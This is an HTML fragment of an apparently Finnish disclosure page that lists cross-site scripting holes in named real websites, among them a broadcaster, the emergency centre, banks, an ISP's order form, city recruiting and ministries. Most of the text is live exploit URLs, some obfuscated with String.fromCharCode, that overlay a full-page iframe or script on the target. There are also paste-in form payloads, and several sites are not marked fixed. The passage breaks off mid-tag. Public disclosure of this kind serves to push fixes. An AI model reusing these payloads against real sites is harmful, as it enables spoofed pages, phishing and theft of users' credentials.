        <a href="http://www.yle.fi/uutiset/haku.php?pub_start=%22%3E<script>document.write(String.fromCharCode(60)%2BString.fromCharCode(105)%2BString.fromCharCode(102)%2BString.fromCharCode(114)%2BString.fromCharCode(97)%2BString.fromCharCode(109)%2BString.fromCharCode(101)%2BString.fromCharCode(32)%2BString.fromCharCode(115)%2BString.fromCharCode(114)%2BString.fromCharCode(99)%2BString.fromCharCode(61)%2BString.fromCharCode(34)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(116)%2BString.fromCharCode(112)%2BString.fromCharCode(58)%2BString.fromCharCode(47)%2BString.fromCharCode(47)%2BString.fromCharCode(119)%2BString.fromCharCode(119)%2BString.fromCharCode(119)%2BString.fromCharCode(46)%2BString.fromCharCode(112)%2BString.fromCharCode(111)%2BString.fromCharCode(108)%2BString.fromCharCode(105)%2BString.fromCharCode(105)%2BString.fromCharCode(115)%2BString.fromCharCode(105)%2BString.fromCharCode(46)%2BString.fromCharCode(102)%2BString.fromCharCode(105)%2BString.fromCharCode(34)%2BString.fromCharCode(115)%2BString.fromCharCode(116)%2BString.fromCharCode(121)%2BString.fromCharCode(108)%2BString.fromCharCode(101)%2BString.fromCharCode(61)%2BString.fromCharCode(34)%2BString.fromCharCode(100)%2BString.fromCharCode(105)%2BString.fromCharCode(115)%2BString.fromCharCode(112)%2BString.fromCharCode(108)%2BString.fromCharCode(97)%2BString.fromCharCode(121)%2BString.fromCharCode(58)%2BString.fromCharCode(98)%2BString.fromCharCode(108)%2BString.fromCharCode(111)%2BString.fromCharCode(99)%2BString.fromCharCode(107)%2BString.fromCharCode(59)%2BString.fromCharCode(109)%2BString.fromCharCode(105)%2BString.fromCharCode(110)%2BString.fromCharCode(45)%2BString.fromCharCode(104)%2BString.fromCharCode(101)%2BString.fromCharCode(105)%2BString.fromCharCode(103)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(49)%2BString.fromCharCode(48)%2BString.fromCharCode(48)%2BString.fromCharCode(48)%2BString.fromCharCode(112)%2BString.fromCharCode(120)%2BString.fromCharCode(59)%2BString.fromCharCode(112)%2BString.fromCharCode(111)%2BString.fromCharCode(115)%2BString.fromCharCode(105)%2BString.fromCharCode(116)%2BString.fromCharCode(105)%2BString.fromCharCode(111)%2BString.fromCharCode(110)%2BString.fromCharCode(58)%2BString.fromCharCode(97)%2BString.fromCharCode(98)%2BString.fromCharCode(115)%2BString.fromCharCode(111)%2BString.fromCharCode(108)%2BString.fromCharCode(117)%2BString.fromCharCode(116)%2BString.fromCharCode(101)%2BString.fromCharCode(59)%2BString.fromCharCode(116)%2BString.fromCharCode(111)%2BString.fromCharCode(112)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(98)%2BString.fromCharCode(111)%2BString.fromCharCode(116)%2BString.fromCharCode(116)%2BString.fromCharCode(111)%2BString.fromCharCode(109)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(108)%2BString.fromCharCode(101)%2BString.fromCharCode(102)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(114)%2BString.fromCharCode(105)%2BString.fromCharCode(103)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(119)%2BString.fromCharCode(105)%2BString.fromCharCode(100)%2BString.fromCharCode(116)%2BString.fromCharCode(104)%2BString.fromCharCode(58)%2BString.fromCharCode(49)%2BString.fromCharCode(50)%2BString.fromCharCode(56)%2BString.fromCharCode(48)%2BString.fromCharCode(112)%2BString.fromCharCode(120)%2BString.fromCharCode(34)%2BString.fromCharCode(62)%2BString.fromCharCode(60)%2BString.fromCharCode(47)%2BString.fromCharCode(105)%2BString.fromCharCode(102)%2BString.fromCharCode(114)%2BString.fromCharCode(97)%2BString.fromCharCode(109)%2BString.fromCharCode(101)%2BString.fromCharCode(62));</script>%3C!&#8211;&#8221;><b>Yle</b></a> (1/3 aukkoa korjattu<!--1.4.-->)<br />
        Ylen sivuille on mahdollista (joskin hieman pidemmän mutkan kautta kuin muille tällä listalla) syöttää käytännössä mitä tahansa haittakoodia. Ylen keskustelualueella on enemmänkin XSS-aukkoja - oikeastaan koko softa pitäisi vaihtaa jos haluavat nuo korjata. (<a href="http://chat.yle.fi/cgi-bin/urheilu/keskustelu/forumdisplay.cgi?action=topics&#038;forum=xss&#038;number=2&#038;DaysPrune=%22%3E%3Cscript%3Ealert('Sivustolta on loytynyt XSS-aukko.')%3C/script%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/chat.yle.fi');">esim 1</a>, <a href="http://chat.yle.fi/cgi-bin/urheilu/keskustelu/postings.cgi?action=reply&#038;number=2&#038;topic=000369.cgi&#038;TopicSubject=&#038;forum=%3Ch1%3E%20.%20%20%20XSS-haavoittuvuuden%20ongelma%20on,%20etta%20sisaltoa%20voi%20kirjoittaa%20sivustolle%20ja%20siten%20saada%20sivusto%20nayttamaan%20milta%20tahansa.%20-Mikael%20Korpela%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ciframe%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/chat.yle.fi');">esim 2</a>). Ensimmäinen esimerkki aukaisee poliisi.fi-sivuston Ylen sivun päälle ja jälkimmäinen näyttää vain varoituksen.
    </li>
<li><a href="http://www.112.fi/index.php?pageName=%22%3E%3Cscript%3Edocument.write(String.fromCharCode(60)%2BString.fromCharCode(105)%2BString.fromCharCode(102)%2BString.fromCharCode(114)%2BString.fromCharCode(97)%2BString.fromCharCode(109)%2BString.fromCharCode(101)%2BString.fromCharCode(32)%2BString.fromCharCode(115)%2BString.fromCharCode(114)%2BString.fromCharCode(99)%2BString.fromCharCode(61)%2BString.fromCharCode(34)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(116)%2BString.fromCharCode(112)%2BString.fromCharCode(58)%2BString.fromCharCode(47)%2BString.fromCharCode(47)%2BString.fromCharCode(119)%2BString.fromCharCode(119)%2BString.fromCharCode(119)%2BString.fromCharCode(46)%2BString.fromCharCode(112)%2BString.fromCharCode(111)%2BString.fromCharCode(108)%2BString.fromCharCode(105)%2BString.fromCharCode(105)%2BString.fromCharCode(115)%2BString.fromCharCode(105)%2BString.fromCharCode(46)%2BString.fromCharCode(102)%2BString.fromCharCode(105)%2BString.fromCharCode(34)%2BString.fromCharCode(115)%2BString.fromCharCode(116)%2BString.fromCharCode(121)%2BString.fromCharCode(108)%2BString.fromCharCode(101)%2BString.fromCharCode(61)%2BString.fromCharCode(34)%2BString.fromCharCode(100)%2BString.fromCharCode(105)%2BString.fromCharCode(115)%2BString.fromCharCode(112)%2BString.fromCharCode(108)%2BString.fromCharCode(97)%2BString.fromCharCode(121)%2BString.fromCharCode(58)%2BString.fromCharCode(98)%2BString.fromCharCode(108)%2BString.fromCharCode(111)%2BString.fromCharCode(99)%2BString.fromCharCode(107)%2BString.fromCharCode(59)%2BString.fromCharCode(109)%2BString.fromCharCode(105)%2BString.fromCharCode(110)%2BString.fromCharCode(45)%2BString.fromCharCode(104)%2BString.fromCharCode(101)%2BString.fromCharCode(105)%2BString.fromCharCode(103)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(49)%2BString.fromCharCode(48)%2BString.fromCharCode(48)%2BString.fromCharCode(48)%2BString.fromCharCode(112)%2BString.fromCharCode(120)%2BString.fromCharCode(59)%2BString.fromCharCode(112)%2BString.fromCharCode(111)%2BString.fromCharCode(115)%2BString.fromCharCode(105)%2BString.fromCharCode(116)%2BString.fromCharCode(105)%2BString.fromCharCode(111)%2BString.fromCharCode(110)%2BString.fromCharCode(58)%2BString.fromCharCode(97)%2BString.fromCharCode(98)%2BString.fromCharCode(115)%2BString.fromCharCode(111)%2BString.fromCharCode(108)%2BString.fromCharCode(117)%2BString.fromCharCode(116)%2BString.fromCharCode(101)%2BString.fromCharCode(59)%2BString.fromCharCode(116)%2BString.fromCharCode(111)%2BString.fromCharCode(112)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(98)%2BString.fromCharCode(111)%2BString.fromCharCode(116)%2BString.fromCharCode(116)%2BString.fromCharCode(111)%2BString.fromCharCode(109)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(108)%2BString.fromCharCode(101)%2BString.fromCharCode(102)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(114)%2BString.fromCharCode(105)%2BString.fromCharCode(103)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(119)%2BString.fromCharCode(105)%2BString.fromCharCode(100)%2BString.fromCharCode(116)%2BString.fromCharCode(104)%2BString.fromCharCode(58)%2BString.fromCharCode(49)%2BString.fromCharCode(50)%2BString.fromCharCode(56)%2BString.fromCharCode(48)%2BString.fromCharCode(112)%2BString.fromCharCode(120)%2BString.fromCharCode(34)%2BString.fromCharCode(62)%2BString.fromCharCode(60)%2BString.fromCharCode(47)%2BString.fromCharCode(105)%2BString.fromCharCode(102)%2BString.fromCharCode(114)%2BString.fromCharCode(97)%2BString.fromCharCode(109)%2BString.fromCharCode(101)%2BString.fromCharCode(62));%3C/script%3E%3Ciframe%3E%3C!--%3Ca%20name=%22xss" onclick="javascript:urchinTracker ('/outbound/article/www.112.fi');"><b>Hätäkeskuslaitos</b></a><br />
        Hätäkeskuksen sivuille voi kirjoittaa mitä tahansa haittakoodia. Esimerkki lataa poliisi.fi-sivuston ko. sivun päälle.
    </li>
<li>
        <a href="http://www.uku.fi/cgi-bin/htsearch?words=%22%3E%3Cscript%3Ealert(String.fromCharCode(83)%2BString.fromCharCode(105)%2BString.fromCharCode(118)%2BString.fromCharCode(117)%2BString.fromCharCode(115)%2BString.fromCharCode(116)%2BString.fromCharCode(111)%2BString.fromCharCode(108)%2BString.fromCharCode(116)%2BString.fromCharCode(97)%2BString.fromCharCode(32)%2BString.fromCharCode(111)%2BString.fromCharCode(110)%2BString.fromCharCode(32)%2BString.fromCharCode(108)%2BString.fromCharCode(111)%2BString.fromCharCode(121)%2BString.fromCharCode(116)%2BString.fromCharCode(121)%2BString.fromCharCode(110)%2BString.fromCharCode(121)%2BString.fromCharCode(116)%2BString.fromCharCode(32)%2BString.fromCharCode(88)%2BString.fromCharCode(83)%2BString.fromCharCode(83)%2BString.fromCharCode(45)%2BString.fromCharCode(104)%2BString.fromCharCode(97)%2BString.fromCharCode(97)%2BString.fromCharCode(118)%2BString.fromCharCode(111)%2BString.fromCharCode(105)%2BString.fromCharCode(116)%2BString.fromCharCode(116)%2BString.fromCharCode(117)%2BString.fromCharCode(118)%2BString.fromCharCode(117)%2BString.fromCharCode(117)%2BString.fromCharCode(115)%2BString.fromCharCode(46))%3C/script%3E%3C!--%3Ca name=%22" onclick="javascript:urchinTracker ('/outbound/article/www.uku.fi');"><b>Kuopion yliopisto</b></a><br />
        Haavoittuvuuden avulla Kuopion yliopiston sivuille voidaan kirjoittaa mitä tahansa haittakoodia. Esimerkki kertoo haavoittuvuudesta virheilmoituksena.
    </li>
<li>
    	<a href="http://telkku.com/?XSS=%22%3E%3Ciframe+frameborder%3D%220%22style%3D%22min%2Dheight%3A1000px%3Btop%3A0%3Bbottom%3A0%3Bleft%3A0%3Bwidth%3A1270px%3Bright%3A0%3Bdisplay%3Ablock%3Bposition%3Aabsolute%3B%22src%3D%22http%3A%2F%2Fwww%2Epoliisi%2Efi%22%3E%3C%2Fiframe%3E%3Ciframe%3E%3Ctextarea%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/telkku.com');"><b>Telkku.com</b></a><br />
    	Telkku.com on todella reikäinen ja sisältää vaarallisenkin XSS-aukon. Syötteitä <i>ainoastakaan sivuston lomakkeesta</i> ei tarkisteta ja sivuston URL kopioidaan sellaisenaan tarkistamatta sivuston lähdekoodiin - useita kertoja. Esimerkki lataa poliisi.fi-sivun.</p>
<p>        Sivustolle on myös mahdollista tallentaa pysyvästi haittakoodia muiden surffailijoiden nähtäväksi - tämä ei siis vaadi minkäänlaista linkin lähettämistä tms. hyökkääjältä, vain sen että telkku.comissa surffailija sattuu eksymään vahingoitetulle sivulle. <a href="http://www.telkku.com/profiili?user=xss" onclick="javascript:urchinTracker ('/outbound/article/www.telkku.com');">Esimerkki varoittaa haavoittuvuudesta</a> (muokattu telkku.comin käyttäjäsivu).
    </li>
<li>
    	<a href="https://www4.sonera.fi/kauppa/availabilityQuery.do?street=www.ihminen.org/xss/%22%3E%3Cdiv%20style=%22width:690px;height:45px;border:1px%20solid%20yellow;background:white;color:red;margin-left:-15px;font-size:25px;text-align:center;position:absolute;top:70px;padding-top:%2016px;%22%3EPatkii%20se%20kuitenki...%3C/div%3E%3Cspan%20id=%22xss" onclick="javascript:urchinTracker ('/outbound/article/www4.sonera.fi');"><b>Sonera</b></a><br />
    	Soneran salatun yhteyden päässä oleva sivu antaa kirjoittaa laajakaistan tilauslomakkeeseen mitä tahansa haittakoodia. Esimerkki kirjoittaa pienen jekkuboxin sivun ylälaitaan.</p>
<p>        Aukko on siitä vaarallinen, että sivuston kautta käsitellään rahaa ja tarkkoja henkilötietoja.
    </li>
<li>
        <a href="https://www.erekryhelsinki.fi/OpenJobs.asp?AD_JOBKEY=%22%3E%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1274px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/www.erekryhelsinki.fi');"><b>Helsingin kaupunki</b></a> (1/2 korjattu - wlan-aukko jäljellä)<!--1.4.-->)<br />
        Helsingin rekrypalveluiden sivuilta vuotaa sivuille läpi käytännössä mitä tahansa haittakoodia. Tämän avulla voi tekaista esim. valheellisia työpaikkailmoituksia, tai sellaisia paikkoja johon ihmiset sitten jättävät lomalleella henkilötietojaan. Toinen aukko on <a href="http://ptp.hel.fi/wlan/start.asp?ptype=test'%3E%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1374px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E%3Ciframe%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/ptp.hel.fi');">WLAN-tukiasemien hakukartalla</a>. Esimerkit latailevat taas tuttua poliisi.fi-sivua.
    </li>
<p><!-- Tää vaatii vielä vähän säätöä...</p>
<li>
    	<a href="http://haku.koulutusnetti.fi/koulutusnetti/titleSearch.do?language=fi&#038;year=2008&#038;useSession=false&#038;command=2007&#038;searchItems=year%3DALL&#038;searchItems=year%3D2008&#038;searchItems=searchPhrase%3DALL&#038;searchItems=searchPhrase%3D%22%3E%3C%2Foption%3E%3C%2Fselect%3E%3Ch1%3EXSS%3C/h1%3E%3Cscript%3Ealert(%22XSS-aukko%22)%3C/script%3E%3C!--&#038;studyEduBranch=&#038;eduBranchYo=&#038;degreeEduType=&#038;degreeName=&#038;degreeTitle=&#038;searchPhrase=&#038;limit=150" onclick="javascript:urchinTracker ('/outbound/article/haku.koulutusnetti.fi');"><b>Koulutusnetti (opetushallitus)</b></a><br />
    	Hakuominaisuus antaa kirjoittaa sivustolle mitä tahansa haittakoodia. Esimerkki näyttää varoitusikkunan.<br />
    	<br /><br  /><br />
    	Lisäys: ei tuo toimikaan niin helposti, mutta post-arvoja muokkaamalla varmaan saisi toimimaan. Eli kopioi tämä teksti hakusanaksi:<br />
    	&#8220;&gt;&lt;/option&gt;&lt;/select&gt;&lt;script&gt;alert(&#8221;XSS-aukko&#8221;)&gt;/script&lt;
    </li>
<p>&#8211;></p>
<li>
    	<a href="http://www.aurinkomatkat.fi/tripsearch/TripSearchController?force=false&#038;ts_ch_gr3=0&#038;ts_max_price=%22%3E%3Ciframe%20frameborder=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1024px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E%3Ciframe%3E&#038;initialized=true&#038;ts_ch_gr2=0&#038;page=200&#038;ts_dep_station=HEL&#038;ts_room_count=1&#038;from=204&#038;ts_accommodation=kaikki&#038;ts_ch_2=0&#038;ts_base_month=3&#038;ts_adults=2&#038;ts_base_year=2008&#038;ts_week=true&#038;ts_out_earliest_day=22&#038;ts_out_earliest_my=0&#038;ts_out_latest_day=29&#038;ts_out_latest_my=0" onclick="javascript:urchinTracker ('/outbound/article/www.aurinkomatkat.fi');"><b>Aurinkomatkat</b></a><br />
    	Aurinkomatkojen hakusivu ei tarkista saamiaan arvoja. Esimerkki lataa poliisi.fi-sivun.
    </li>
<li>
    	Villivision CMS <a href="http://www.luovatampere.fi/?lang=%22%3E%3Ch1%3EXSS-aukko%3C/h1%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/www.luovatampere.fi');"><b>Luova Tampere</b></a>, <a href="http://www.enmac.fi/index.php?action=switch_language&#038;language=%22%3E%3Ch1%3EXSS-aukko%3C/h1%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/www.enmac.fi');"><b>Enmac</b></a><br />
    	Tamperelaisen Villivision-yrityksen ohjelmistossa on xss-haavoittuvuuksia, joiden kautta sivuille voidaan kirjoittaa mitä tahansa sisältöä. Tsekkasin kolme eri sivustoa, mutta tiedä miten paljon firmalla sitten on asiakkaita&#8230; Esimerkit kirjoittelevat tekstejä sivuille.
    </li>
<li>
        <a href="http://www.nokianrenkaat.fi/rengas?id=10469892&#038;group=1%22%3E%3Ch1%3EXSS-aukko%3C/h1%3E" onclick="javascript:urchinTracker ('/outbound/article/www.nokianrenkaat.fi');"><b>Nokian renkaat</b></a><br />
        Simppeli XSS-aukko tulostaa sivulle tekstin.
    </li>
<li>
    	<a href="http://www.score24.com/servlet/Results2?partner=mtv3fi&#038;cat=Today&#038;lang=fin&#038;cat=%3Cscript%3Ealert(%22Sivustolta%20on%20loytynyt%20XSS-haavoittuvuus.%22)%3C/script%3E%EF%BB%BF%3E%3Ciframe+frameborder%3D%220%22style%3D%22min%2Dheight%3A1000px%3Btop%3A0%3Bbottom%3A0%3Bleft%3A0%3Bwidth%3A1270px%3Bright%3A0%3Bdisplay%3Ablock%3Bposition%3Aabsolute%3B%22src%3D%22http%3A%2F%2Fwww%2Epoliisi%2Efi%22%3E%3C%2Fiframe%3E%3Ciframe%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/www.score24.com');"><b>Score24 (mm. mtv3 käyttää)</b></a><br />
    	mm. mtv3-nettisivun käyttämä score24-tulospalvelu sisältää aukon, jonka kautta sivuille voi kirjoittaa mitä tahansa lähdekoodia. Esimerkki lataa poliisi.fi-sivun.
    </li>
<h4>Korjattu</h4>
<p><small>Huom. alempana listassa vielä erikseen korjaamattomat <a href="#post">post-aukot</a>.</small></p>
<li>
    	<a href="http://www.hs.fi/keskustelu/post!post.jspa?forumID=13&#038;reply=false&#038;alias=%22%3E%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1024px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E" onclick="javascript:urchinTracker ('/outbound/article/www.hs.fi');"><b>Helsingin Sanomat</b></a> (2/2 aukkoa korjattu<!--30.3. &#038; 1.4.-->)<br />
        Esimerkki aukaisee hs.fi:n päälle poliisi.fi-sivun. Haavoittuvuuden avulla on mahdollista esimerkiksi vakoilla käyttäjän tunnukset. Tunnuksilla voisi esim. tehdä osoitteenmuutoksia, tuote- ja lehtitilauksia.</p>
<p>        Aiemmin löytämäni <a href="https://www.hs.fi/kirjautuminen/kirjaudu/?TARGET=/arkisto/%22%20/%3E%3Cscript%3Ealert(%22XSS haavoittuvuus löytyi.%22);%3C/script%3E%3Cinput%20type=%22text%22size=%2240%22value=%22Tässä%20on%20XSS%20haavoittuvuus" onclick="javascript:urchinTracker ('/outbound/article/www.hs.fi');">XSS-aukko</a> korjattiin 30.3.
    </li>
<li>
        <a href="https://www.op.fi/linkki?url=%22%3E%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1280px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E" onclick="javascript:urchinTracker ('/outbound/article/www.op.fi');"><b>Osuuspankki</b></a> (korjattu<!--31.3.-->)<br />
        Osuuspankin sivuilla edelleenohjaussivu antaa kirjoittaa sivulle käytännössä mitä tahansa koodia. Sama ongelma kuin pohjolassa. Esimerkissä ko. sivun päälle on ladattu poliisi.fi. Joskus vian ilmeneminen vaatii ensin <a href="http://www.op.fi" onclick="javascript:urchinTracker ('/outbound/article/www.op.fi');">op.fi</a>-osoitteessa käyntiä, en tiedä miksi.</p>
<p>        Tästä minulla on <a href="http://www.ihminen.org/xss/op_poliisi_xss.tiff" >kuvakaappaus</a> (TIF, 680 Kb), josta näkyy kuinka osoiterivillä lukee op.fi, sivuksi on ladattu poliisi.fi ja oikeassa ylänurkassa vieläpä onnistuneesta salatusta yhteydestä kertova lukko.
    </li>
<li>
        <a href="https://www.pohjola.fi/linkki?url=%22%3E%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1280px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E" onclick="javascript:urchinTracker ('/outbound/article/www.pohjola.fi');"><b>Pohjola</b></a> (korjattu<!--31.3.-->)<br />
        Pohjolan sivuilla edelleenohjaussivu antaa kirjoittaa sivulle käytännössä mitä tahansa koodia. Esimerkissä ko. sivun päälle on ladattu poliisi.fi.
    </li>
<li>
        <a href="http://www.aktia.fi/index.jsp?navi-main='%3E%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1280px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E%3Ciframe%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/www.aktia.fi');"><b>Aktia Säästöpankki</b></a> (korjattu)<br />
        Aktian sivuilta XSS-aukko löytyi ennätysnopeasti. Heti etusivulla muutamassa sekunnissa! Esimerkissä ko. sivun päälle on ladattu poliisi.fi.</p>
<p>        Tästä minulla on <a href="http://www.ihminen.org/xss/aktia_poliisi_xss.tiff" >kuvakaappaus</a> (TIF, 341 Kb), josta näkyy kuinka osoiterivillä lukee aktia.fi ja sivuksi on ladattu poliisi.fi
    </li>
<li>
        <a href="https://yrityspalvelu.tapiola.fi/a3/YvpAuthWeb/free/web/yhteydenotto/index.asp?Page=yhteydenotto%2Easp" onclick="javascript:urchinTracker ('/outbound/article/yrityspalvelu.tapiola.fi');"><b>Tapiola</b></a> (korjattu<!--3.4.-->)<br />
        Tapiolan sivuilla on lomake, joka antaa kirjoittaa sivupohjaan mitä tahansa haittakoodia. En ole vielä ehtinyt tutkia, miten sitä voisi hyödyntää XSS-aukkona (jotenkin sopivasti POST-tietoja tuonne lähettämällä jokatapauksessa), mutta voitte itse kokeilla kopioimalla vaikkapa yrityksen nimi-kenttään tämän tekstin: &#8220;&gt;&lt;h1&gt;XSS-aukko&lt;!&#8211;
    </li>
<li>
        <a href="http://www.minedu.fi/OPM/Tarkennettu_haku/Tarkennettu_haku?lang=fi&#038;and=%22%3E%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1280px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E" onclick="javascript:urchinTracker ('/outbound/article/www.minedu.fi');"><b>Opetusministeriö</b></a><br />
        Opetusministeriön sivuilla hakusivu antaa kirjoittaa sivulle käytännössä mitä tahansa koodia. Esimerkissä ko. sivun päälle on ladattu poliisi.fi.
    </li>
<li>
        <a href="http://www.oph.fi/frontpage.asp?path=--%3E%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1024px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E%3C!--" onclick="javascript:urchinTracker ('/outbound/article/www.oph.fi');"><b>Opetushallitus</b></a><br />
        Esimerkissä Opetushallituksen sivuston päälle aukaistaan poliisi.fi-sivusto. Haavoittuvuuden avulla voidaan ladata mitä tahansa sisältöä OPH:n sivuston sisälle.
    </li>
<li>
        <a href="http://www.elake-fennia.fi/Search.aspx?query=%3Ciframe%20border=%220%22%20style=%22min-height:1000px;top:0;bottom:0;left:0;%20width:1280px;right:0;display:block;position:absolute;%22%20src=%22http://www.poliisi.fi%22%3E%3C/iframe%3E%3Ciframe%3E%3C!--XSS" onclick="javascript:urchinTracker ('/outbound/article/www.elake-fennia.fi');"><b>Eläke-Fennia</b></a><br />
        Eläke-Fennian sivuilla hakusivu antaa kirjoittaa sivulle käytännössä mitä tahansa koodia ilman minkäänlaista tarkistusta. Esimerkissä ko. sivun päälle on ladattu poliisi.fi. Sivu voi ladata hetken (löytää paljon osumia hakukentän kautta.)
    </li>
<li>
        <a href="http://www.om.fi/Etusivu/Ajankohtaista/Pohjoismainensaamenkielipalkinto?pagename=--%3E%3Cscript%3Edocument.write(String.fromCharCode(60)%2BString.fromCharCode(105)%2BString.fromCharCode(102)%2BString.fromCharCode(114)%2BString.fromCharCode(97)%2BString.fromCharCode(109)%2BString.fromCharCode(101)%2BString.fromCharCode(32)%2BString.fromCharCode(115)%2BString.fromCharCode(114)%2BString.fromCharCode(99)%2BString.fromCharCode(61)%2BString.fromCharCode(34)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(116)%2BString.fromCharCode(112)%2BString.fromCharCode(58)%2BString.fromCharCode(47)%2BString.fromCharCode(47)%2BString.fromCharCode(119)%2BString.fromCharCode(119)%2BString.fromCharCode(119)%2BString.fromCharCode(46)%2BString.fromCharCode(112)%2BString.fromCharCode(111)%2BString.fromCharCode(108)%2BString.fromCharCode(105)%2BString.fromCharCode(105)%2BString.fromCharCode(115)%2BString.fromCharCode(105)%2BString.fromCharCode(46)%2BString.fromCharCode(102)%2BString.fromCharCode(105)%2BString.fromCharCode(34)%2BString.fromCharCode(115)%2BString.fromCharCode(116)%2BString.fromCharCode(121)%2BString.fromCharCode(108)%2BString.fromCharCode(101)%2BString.fromCharCode(61)%2BString.fromCharCode(34)%2BString.fromCharCode(100)%2BString.fromCharCode(105)%2BString.fromCharCode(115)%2BString.fromCharCode(112)%2BString.fromCharCode(108)%2BString.fromCharCode(97)%2BString.fromCharCode(121)%2BString.fromCharCode(58)%2BString.fromCharCode(98)%2BString.fromCharCode(108)%2BString.fromCharCode(111)%2BString.fromCharCode(99)%2BString.fromCharCode(107)%2BString.fromCharCode(59)%2BString.fromCharCode(109)%2BString.fromCharCode(105)%2BString.fromCharCode(110)%2BString.fromCharCode(45)%2BString.fromCharCode(104)%2BString.fromCharCode(101)%2BString.fromCharCode(105)%2BString.fromCharCode(103)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(49)%2BString.fromCharCode(48)%2BString.fromCharCode(48)%2BString.fromCharCode(48)%2BString.fromCharCode(112)%2BString.fromCharCode(120)%2BString.fromCharCode(59)%2BString.fromCharCode(112)%2BString.fromCharCode(111)%2BString.fromCharCode(115)%2BString.fromCharCode(105)%2BString.fromCharCode(116)%2BString.fromCharCode(105)%2BString.fromCharCode(111)%2BString.fromCharCode(110)%2BString.fromCharCode(58)%2BString.fromCharCode(97)%2BString.fromCharCode(98)%2BString.fromCharCode(115)%2BString.fromCharCode(111)%2BString.fromCharCode(108)%2BString.fromCharCode(117)%2BString.fromCharCode(116)%2BString.fromCharCode(101)%2BString.fromCharCode(59)%2BString.fromCharCode(116)%2BString.fromCharCode(111)%2BString.fromCharCode(112)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(98)%2BString.fromCharCode(111)%2BString.fromCharCode(116)%2BString.fromCharCode(116)%2BString.fromCharCode(111)%2BString.fromCharCode(109)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(108)%2BString.fromCharCode(101)%2BString.fromCharCode(102)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(114)%2BString.fromCharCode(105)%2BString.fromCharCode(103)%2BString.fromCharCode(104)%2BString.fromCharCode(116)%2BString.fromCharCode(58)%2BString.fromCharCode(48)%2BString.fromCharCode(59)%2BString.fromCharCode(119)%2BString.fromCharCode(105)%2BString.fromCharCode(100)%2BString.fromCharCode(116)%2BString.fromCharCode(104)%2BString.fromCharCode(58)%2BString.fromCharCode(49)%2BString.fromCharCode(50)%2BString.fromCharCode(56)%2BString.fromCharCode(48)%2BString.fromCharCode(112)%2BString.fromCharCode(120)%2BString.fromCharCode(34)%2BString.fromCharCode(62)%2BString.fromCharCode(60)%2BString.fromCharCode(47)%2BString.fromCharCode(105)%2BString.fromCharCode(102)%2BString.fromCharCode(114)%2BString.fromCharCode(97)%2BString.fromCharCode(109)%2BString.fromCharCode(101)%2BString.fromCharCode(62))%3C/script%3E%3Ciframe%20frameborder=%220%22%3E%3C!--" onclick="javascript:urchinTracker 